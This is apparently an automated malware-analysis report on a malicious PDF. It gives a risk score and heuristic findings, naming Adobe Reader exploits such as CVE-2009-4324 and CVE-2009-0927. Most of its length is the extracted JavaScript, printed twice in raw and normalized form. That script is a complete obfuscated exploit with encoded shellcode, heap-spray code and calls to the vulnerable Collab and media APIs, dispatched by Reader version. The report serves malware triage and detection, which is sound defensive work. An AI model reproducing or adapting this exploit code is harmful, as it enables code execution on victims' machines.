MALICIOUS
330
Risk Score
Machine Learning
- Nyx PDF Classifier malicious score 0.9997
Heuristics 9
-
media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (matched in decompressed stream)
-
Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (matched in decompressed stream)
-
Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCHA single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Obfuscated multi-stage PDF JavaScript heap-spray exploit critical PDF_JS_OBFUSCATED_MULTISTAGE_HEAPSPRAYPDF JavaScript hidden behind nested stream filters and/or a custom in-JS decoder (rolling-XOR stager) decodes to a heap-spray / ROP chain. The spray is only visible after unwinding those layers, which is why the raw heap-spray rules miss it. This is an obfuscated multi-stage Adobe Reader JavaScript exploit; the dropped Windows payload (often named Win.Trojan.Agent by signature AV) is the second stage, not the delivery mechanism.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERYBounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
- http://ns.adobe.com/pdf/1.3/In PDF document text
- http://ns.adobe.com/xap/1.0/In PDF document text
- http://purl.org/dc/elements/1.1/In PDF document text
- http://ns.adobe.com/xap/1.0/mm/In PDF document text
- http://ns.adobe.com/pdfx/1.3/In PDF document text
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0017_000.js |
pdf-javascript-stream | PDF /JS object 17 at offset 0x4DA | 5390 bytes |
SHA-256: 950a4aa38d32c2c44e0b10e1a6ca71e82f62814d662fa32bb41d4e2065edfe0f |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var unes=unescape;
function rep(count,what){
var v="";
while(--count>=0) v+=what;
return v;
}
function myunes(buf){
var ret='';
for (var x=0;x<buf["\x6c\x65\x6e\x67\x74\x68"];x+=2){
ret+=util["\x62\x79\x74e\x54\x6f\x43\x68\x61\x72"](Number('0x'+buf["\x73\x75\x62\x73\x74\x72"](x,2)));//
}
return ret;
}
var sc;
for(i=0;i<18000;i++)
sc=sc+0x60;
sc=unes("%u4341%u4b49%u11EB%u5BFC%u334B%u66C9%ub0B9%u8001%u0B34%uE2f9"+
"\x25\x75EBFA\x25\x75E805\x25\x75FFEB\x25\x75FFFF\x25\x75F911\x25\x75F9F9\x25\x75A3F9\x25\x7572AC\x25\x757815\x25\x759D15\x25\x75F9FD\x25\x7572F9"+
"%u110D%uF869%uF9F9%u0172%u1611%uF9F9%u70F9%u06FF"+
"%u91CF%u6254%u2684%uED11%uF9F8%u70F9%uF5BF%uCF06"+
"%uD091%u3FEB%u11AF%uF8FC%uF9F9%uBF70%u06E9%u91CF"+
"%uC5A0%u82FE%u0F11%uF9F9%u70F9%uEDBF%uCF06%u8791"+
"%u1B21%u118A%uF91E%uF9F9%uBF70%uCACD%u1230%u72FA"+
"%uC5B7%u387A%uA8FD%uF993%u06A8%uF5AF%u7AA0%u0601"+
"%u098D%uB9C4%uF9E6%u8FF9%u7010%uC5B7%uF993%uF993"+
"%uF993%uFB93%uF993%u8F06%u06C5%uE9AF%uBF70%u7ABD"+
"%uF901%u328D%uF993%uF993%uF993%uFD93%u8F06%u06BD"+
"%uEDAF%uBF70%u7AB1%uF901%u4C8D%uC178%uA9DC%uBFBD"+
"%uB772%u8CC5%u7854%uF941%uF9EB%uA9F9%uA99D%u8CBD"+
"%u7858%uFD41%uF9EB%u16F9%u1307%u8C57%u406C%uFFF9"+
"%uF9F9%u1578%uF1F9%uF9F9%uAEAF%u0972%u3F78%uEBE9"+
"%uF9F9%u3D72%u397A%u72F1%u0A01%u405D%uFFF9%uF9F9"+
"%uB0B0%uB0B0%uCD78%u17F1%u0707%u7C16%u8C30%uA608"+
"%u06A7%uC58F%u8F06%u06B1%uBD8F%u1906%uAFAC%u589D"+
"%uF9C9%uF9F9%u397C%uEA81%u72C7%uF5B9%u72C7%uE589"+
"%u72C7%uF1A7%uC754%u9172%u12F1%uC7F4%uB972%uC7CD"+
"%u5172%uF941%uF9F9%u22CA%u3C72%uA4A7%uFD3B%uAAF9"+
"%uAFAC%uCFAE%u9572%uE1DD%u72CF%uC5BC%u72CF%uFCAD"+
"%uFA81%uC72C%uB372%uC7E1%uA372%uFAD9%u1A24%uB0C5"+
"%u72C7%u72CD%u0CFA%u06CA%uCA05%u5539%u3DC3%uFE8D"+
"%u3638%uFAF4%u1201%uCF0B%u85C2%uEDDD%u268C%u3B72"+
"%u397A%uC7DD%uE172%u24FA%uC79F%uF572%uC7B2%uA372"+
"\x25\x75FAE5\x25\x75C724\x25\x75FD72\x25\x75FA72\x25\x75123C\x25\x75CAFB\x25\x757239\x25\x75A62C"+
"%uA4A7%u3BA2%uF9F1%uF911%uF9F9%uA1F9%u397A%u3AFC");
function exp() {
var sc1="";
blah=rep(128,unes("%u4242%u4242%u4242%u4242%u4242"))+sc1+sc;
bbk=unes("%u4242%u4242");
wap=20+blah["\x6c\x65\x6e\x67\x74\x68"]
while(bbk["\x6c\x65\x6e\x67\x74\x68"]<wap) bbk+=bbk;
fillbk=bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0,wap);
bk=bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0,bbk["\x6c\x65\x6e\x67\x74\x68"]-wap);
while(bk["\x6c\x65\x6e\x67\x74\x68"]+wap<0x40000) bk=bk+bk+fillbk;
mm=new Array();
for(i=0;i<200;i++) mm[i]=bk+blah;
of=rep(4096,myunes("0a0a0a0a"));
var a=["\x5f\x4e\x2e\x62\x75\x6e\x64\x6c\x65"];//next time
Collab["g\x65t\x49\x63\x6f\x6e"](of+a[0x0]);
}
function start()
{
if(app.viewerVersion>=7.0)
{
plin=rep(1124,unes("%u0b0b%u0028%u06eb%u06eb"))+unes("%u0b0b%u0028%u0aeb%u0aeb")+unes("%u4346%u4a4b")+rep(122,unes("%u0b0b%u0028%u06eb%u06eb"))+sc+rep(1256,unes("%u4a4b%u4748"));
}
else
{
ef6=unes("%uf6eb%uf6eb")+unes("%u0b0b%u0019");
plin=rep(80,unes("\x25\x754141\x25\x754141"))+sc+rep(80,unes("\x25\x754241\x25\x754142"))+unes("\x25\x75f7e9\x25\x75fff9")+unes("\x25\x75ffff\x25\x75ffff");
while((plin.length%8)!=0)
plin=unes("\x25\x754141")+plin;
plin+=rep(2626,ef6);
}
if (app.viewerVersion>=6.0)
{
Collab["c\x6fll\x65\x63\x74\x45\x6d\x61\x69\x6c\x49\x6e\x66\x6f"]({subj:0,msg:plin});
}
}
if(app.viewerVersion>9.0){
var QVGaOwzwDZKwxGeQpKmiXsRvZHKaDZBUqJOJuDdvKMYnhGLNNjxscBfBbPYjsjrScRhbRxrUToizpIvPMHrMRKcUZVxE;
for(i=0;i<18000;i++)
QVGaOwzwDZKwxGeQpKmiXsRvZHKaDZBUqJOJuDdvKMYnhGLNNjxscBfBbPYjsjrScRhbRxrUToizpIvPMHrMRKcUZVxE=QVGaOwzwDZKwxGeQpKmiXsRvZHKaDZBUqJOJuDdvKMYnhGLNNjxscBfBbPYjsjrScRhbRxrUToizpIvPMHrMRKcUZVxE +0x77;
var AKjtQExdzrASxZtHTFMSwNZfztONMZPULUqwGGdUSJSLxByMJtOdErPceyqDZbc = unes("\x25\x750\x630\x63\x25\x750\x630\x63");
var QVGaOwzwDZKwxGeQpKmiXsRvZHKaDZBUqJOJuDdvKMYnhGLNNjxscBfBbPYjsjrScRhbRxrUToizpIvPMHrMRKcUZVxE = unes("\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c%u5a51%u4874%u5961%u6b71%u4772%u6a47%u4a73%u6247%u654b%u734b%u4858%u6371%u717a%u7672%u626e%u626e%u455a%u4243%u6764%u7646%u696b%u6a6e%u4e61%u6c6d%u7350%u5168%u7171%u5574");
while(AKjtQExdzrASxZtHTFMSwNZfztONMZPULUqwGGdUSJSLxByMJtOdErPceyqDZbc.length <= 32768) AKjtQExdzrASxZtHTFMSwNZfztONMZPULUqwGGdUSJSLxByMJtOdErPceyqDZbc+=AKjtQExdzrASxZtHTFMSwNZfztONMZPULUqwGGdUSJSLxByMJtOdErPceyqDZbc;
AKjtQExdzrASxZtHTFMSwNZfztONMZPULUqwGGdUSJSLxByMJtOdErPceyqDZbc=AKjtQExdzrASxZtHTFMSwNZfztONMZPULUqwGGdUSJSLxByMJtOdErPceyqDZbc.substring(0,32768 - sc.length);
aa=new Array();
for(i=0;i<0x2000;i++) {
aa[i]= AKjtQExdzrASxZtHTFMSwNZfztONMZPULUqwGGdUSJSLxByMJtOdErPceyqDZbc + sc;
}
util["\x70\x72\x69n\x74\x64"]("FGgITeSFZAjpOsSyXgoMbUZttCRxNEDbuZjH", new Date());
util["\x70\x72\x69n\x74\x64"]("PAAhBAPMqrBpJVqRwqwcuxjWkEUEcZdEnvdP", new Date());
try
{//comment
this.media["\x6e\x65\x77\x50\x6c\x61\x79\x65\x72"](null);
}///akak
catch(e)
{
}
util["\x70\x72\x69n\x74\x64"](QVGaOwzwDZKwxGeQpKmiXsRvZHKaDZBUqJOJuDdvKMYnhGLNNjxscBfBbPYjsjrScRhbRxrUToizpIvPMHrMRKcUZVxE, new Date());
}else if(app.viewerVersion>=8.0){
var inBrowser=this.external;
if (inBrowser)
var shaft=app.setTimeOut("exp()",1200);
else
exp();
}
else{
var shaft=app.setTimeOut("start()",1200);
}
|
|||
generic_stage_recovery_000.js |
deobfuscated-js | generic stage recovery split-literal-normalize from JavaScript object 17 at offset 0x4DA | 5135 bytes |
SHA-256: 3ad7ca1fada560eeb0bb07c26ce24fe428891d653e51d022916dd7c38ae0976b |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var unes=unescape;
function rep(count,what){
var v="";
while(--count>=0) v+=what;
return v;
}
function myunes(buf){
var ret='';
for (var x=0;x<buf["\x6c\x65\x6e\x67\x74\x68"];x+=2){
ret+=util["\x62\x79\x74e\x54\x6f\x43\x68\x61\x72"](Number('0x'+buf["\x73\x75\x62\x73\x74\x72"](x,2)));//
}
return ret;
}
var sc;
for(i=0;i<18000;i++)
sc=sc+0x60;
sc=unes("%u4341%u4b49%u11EB%u5BFC%u334B%u66C9%ub0B9%u8001%u0B34%uE2f9%uEBFA%uE805%uFFEB%uFFFF%uF911%uF9F9%uA3F9%u72AC%u7815%u9D15%uF9FD%u72F9%u110D%uF869%uF9F9%u0172%u1611%uF9F9%u70F9%u06FF%u91CF%u6254%u2684%uED11%uF9F8%u70F9%uF5BF%uCF06%uD091%u3FEB%u11AF%uF8FC%uF9F9%uBF70%u06E9%u91CF%uC5A0%u82FE%u0F11%uF9F9%u70F9%uEDBF%uCF06%u8791%u1B21%u118A%uF91E%uF9F9%uBF70%uCACD%u1230%u72FA%uC5B7%u387A%uA8FD%uF993%u06A8%uF5AF%u7AA0%u0601%u098D%uB9C4%uF9E6%u8FF9%u7010%uC5B7%uF993%uF993%uF993%uFB93%uF993%u8F06%u06C5%uE9AF%uBF70%u7ABD%uF901%u328D%uF993%uF993%uF993%uFD93%u8F06%u06BD%uEDAF%uBF70%u7AB1%uF901%u4C8D%uC178%uA9DC%uBFBD%uB772%u8CC5%u7854%uF941%uF9EB%uA9F9%uA99D%u8CBD%u7858%uFD41%uF9EB%u16F9%u1307%u8C57%u406C%uFFF9%uF9F9%u1578%uF1F9%uF9F9%uAEAF%u0972%u3F78%uEBE9%uF9F9%u3D72%u397A%u72F1%u0A01%u405D%uFFF9%uF9F9%uB0B0%uB0B0%uCD78%u17F1%u0707%u7C16%u8C30%uA608%u06A7%uC58F%u8F06%u06B1%uBD8F%u1906%uAFAC%u589D%uF9C9%uF9F9%u397C%uEA81%u72C7%uF5B9%u72C7%uE589%u72C7%uF1A7%uC754%u9172%u12F1%uC7F4%uB972%uC7CD%u5172%uF941%uF9F9%u22CA%u3C72%uA4A7%uFD3B%uAAF9%uAFAC%uCFAE%u9572%uE1DD%u72CF%uC5BC%u72CF%uFCAD%uFA81%uC72C%uB372%uC7E1%uA372%uFAD9%u1A24%uB0C5%u72C7%u72CD%u0CFA%u06CA%uCA05%u5539%u3DC3%uFE8D%u3638%uFAF4%u1201%uCF0B%u85C2%uEDDD%u268C%u3B72%u397A%uC7DD%uE172%u24FA%uC79F%uF572%uC7B2%uA372%uFAE5%uC724%uFD72%uFA72%u123C%uCAFB%u7239%uA62C%uA4A7%u3BA2%uF9F1%uF911%uF9F9%uA1F9%u397A%u3AFC");
function exp() {
var sc1="";
blah=rep(128,unes("%u4242%u4242%u4242%u4242%u4242"))+sc1+sc;
bbk=unes("%u4242%u4242");
wap=20+blah["\x6c\x65\x6e\x67\x74\x68"]
while(bbk["\x6c\x65\x6e\x67\x74\x68"]<wap) bbk+=bbk;
fillbk=bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0,wap);
bk=bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0,bbk["\x6c\x65\x6e\x67\x74\x68"]-wap);
while(bk["\x6c\x65\x6e\x67\x74\x68"]+wap<0x40000) bk=bk+bk+fillbk;
mm=new Array();
for(i=0;i<200;i++) mm[i]=bk+blah;
of=rep(4096,myunes("0a0a0a0a"));
var a=["\x5f\x4e\x2e\x62\x75\x6e\x64\x6c\x65"];//next time
Collab["g\x65t\x49\x63\x6f\x6e"](of+a[0x0]);
}
function start()
{
if(app.viewerVersion>=7.0)
{
plin=rep(1124,unes("%u0b0b%u0028%u06eb%u06eb"))+unes("%u0b0b%u0028%u0aeb%u0aeb")+unes("%u4346%u4a4b")+rep(122,unes("%u0b0b%u0028%u06eb%u06eb"))+sc+rep(1256,unes("%u4a4b%u4748"));
}
else
{
ef6=unes("%uf6eb%uf6eb")+unes("%u0b0b%u0019");
plin=rep(80,unes("\x25\x754141\x25\x754141"))+sc+rep(80,unes("\x25\x754241\x25\x754142"))+unes("\x25\x75f7e9\x25\x75fff9")+unes("\x25\x75ffff\x25\x75ffff");
while((plin.length%8)!=0)
plin=unes("\x25\x754141")+plin;
plin+=rep(2626,ef6);
}
if (app.viewerVersion>=6.0)
{
Collab["c\x6fll\x65\x63\x74\x45\x6d\x61\x69\x6c\x49\x6e\x66\x6f"]({subj:0,msg:plin});
}
}
if(app.viewerVersion>9.0){
var QVGaOwzwDZKwxGeQpKmiXsRvZHKaDZBUqJOJuDdvKMYnhGLNNjxscBfBbPYjsjrScRhbRxrUToizpIvPMHrMRKcUZVxE;
for(i=0;i<18000;i++)
QVGaOwzwDZKwxGeQpKmiXsRvZHKaDZBUqJOJuDdvKMYnhGLNNjxscBfBbPYjsjrScRhbRxrUToizpIvPMHrMRKcUZVxE=QVGaOwzwDZKwxGeQpKmiXsRvZHKaDZBUqJOJuDdvKMYnhGLNNjxscBfBbPYjsjrScRhbRxrUToizpIvPMHrMRKcUZVxE +0x77;
var AKjtQExdzrASxZtHTFMSwNZfztONMZPULUqwGGdUSJSLxByMJtOdErPceyqDZbc = unes("\x25\x750\x630\x63\x25\x750\x630\x63");
var QVGaOwzwDZKwxGeQpKmiXsRvZHKaDZBUqJOJuDdvKMYnhGLNNjxscBfBbPYjsjrScRhbRxrUToizpIvPMHrMRKcUZVxE = unes("\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c%u5a51%u4874%u5961%u6b71%u4772%u6a47%u4a73%u6247%u654b%u734b%u4858%u6371%u717a%u7672%u626e%u626e%u455a%u4243%u6764%u7646%u696b%u6a6e%u4e61%u6c6d%u7350%u5168%u7171%u5574");
while(AKjtQExdzrASxZtHTFMSwNZfztONMZPULUqwGGdUSJSLxByMJtOdErPceyqDZbc.length <= 32768) AKjtQExdzrASxZtHTFMSwNZfztONMZPULUqwGGdUSJSLxByMJtOdErPceyqDZbc+=AKjtQExdzrASxZtHTFMSwNZfztONMZPULUqwGGdUSJSLxByMJtOdErPceyqDZbc;
AKjtQExdzrASxZtHTFMSwNZfztONMZPULUqwGGdUSJSLxByMJtOdErPceyqDZbc=AKjtQExdzrASxZtHTFMSwNZfztONMZPULUqwGGdUSJSLxByMJtOdErPceyqDZbc.substring(0,32768 - sc.length);
aa=new Array();
for(i=0;i<0x2000;i++) {
aa[i]= AKjtQExdzrASxZtHTFMSwNZfztONMZPULUqwGGdUSJSLxByMJtOdErPceyqDZbc + sc;
}
util["\x70\x72\x69n\x74\x64"]("FGgITeSFZAjpOsSyXgoMbUZttCRxNEDbuZjH", new Date());
util["\x70\x72\x69n\x74\x64"]("PAAhBAPMqrBpJVqRwqwcuxjWkEUEcZdEnvdP", new Date());
try
{//comment
this.media["\x6e\x65\x77\x50\x6c\x61\x79\x65\x72"](null);
}///akak
catch(e)
{
}
util["\x70\x72\x69n\x74\x64"](QVGaOwzwDZKwxGeQpKmiXsRvZHKaDZBUqJOJuDdvKMYnhGLNNjxscBfBbPYjsjrScRhbRxrUToizpIvPMHrMRKcUZVxE, new Date());
}else if(app.viewerVersion>=8.0){
var inBrowser=this.external;
if (inBrowser)
var shaft=app.setTimeOut("exp()",1200);
else
exp();
}
else{
var shaft=app.setTimeOut("start()",1200);
}
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.